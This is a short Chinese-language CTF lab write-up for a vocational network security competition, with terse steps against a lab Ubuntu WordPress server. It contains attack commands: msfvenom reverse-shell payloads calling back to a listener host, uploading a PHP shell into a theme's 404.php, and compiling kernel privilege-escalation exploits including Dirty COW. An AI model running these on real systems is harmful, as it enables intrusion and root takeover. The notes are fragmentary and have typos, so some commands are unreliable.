中职网络安全B模块(系统漏洞提权)

B-1:系统漏洞利用与提权

任务环境说明:

  • 服务器场景:PYsystem001
  • 服务器场景操作系统:Ubuntu(显示链接)
  • 服务器用户名:未知 密码:未知
  1. 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交 nmap -sS -T4 -n ip
  2. 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;dirb 网址找到后台
  3. 中职网络安全B模块(系统漏洞提权)_第1张图片 admin 123456
  4. 利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交
  5. payload
  6. 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获

点击刷子然后点击最后一个进去点击404把木马上传

得的当前权限的用户名作为FLAG(形式:[用户名])提交;

中职网络安全B模块(系统漏洞提权)_第2张图片

https://192.168.137.233/wordpress/wp-content/twentythirteen/404.php访问回弹shell

中职网络安全B模块(系统漏洞提权)_第3张图片

 

  1. 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;
  2. 在Kalei中查找可使用的漏洞源码,将找到的漏洞源码文件名作为FLAG(形式:[文件名])提交;37292.c
  3. 中职网络安全B模块(系统漏洞提权)_第4张图片
  4. 利用上述漏洞源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;
  5. 已经放在kali/root      wget http://ip/37292.c
  6. 中职网络安全B模块(系统漏洞提权)_第5张图片
  7. 进入cd /tmp  -P是大写
  8. 利用上述漏洞源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。
  9. 中职网络安全B模块(系统漏洞提权)_第6张图片
  10. gcc 37292.c -o 37292    chmod 777 37292  ./37292   拿到shell直接cat查看   

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.5 lport=4444 -f exe >shell.exe

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.43.5 lport=4444 -f elf >/root/shell.eif

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php

use  exploit /mlti/handler

scp -r /root/test.elf ubunt@ip

uname -an 查看内核版本信息

search tab  内核  可以查看到源码

gcc [漏洞文件] -o [编译后的文件名]

ls

chmod 777 源码

cd /root   cat 查看即可

藏牛提权
使用命令uname -a
看到linux的内核版本
只要版本低于3.10直接搜索40893
那个是ubuntu系统的
然后使用gcc -pthread 40893.c -o 1 -lcrypt

你可能感兴趣的:(linux,网络,web安全,网络安全,安全)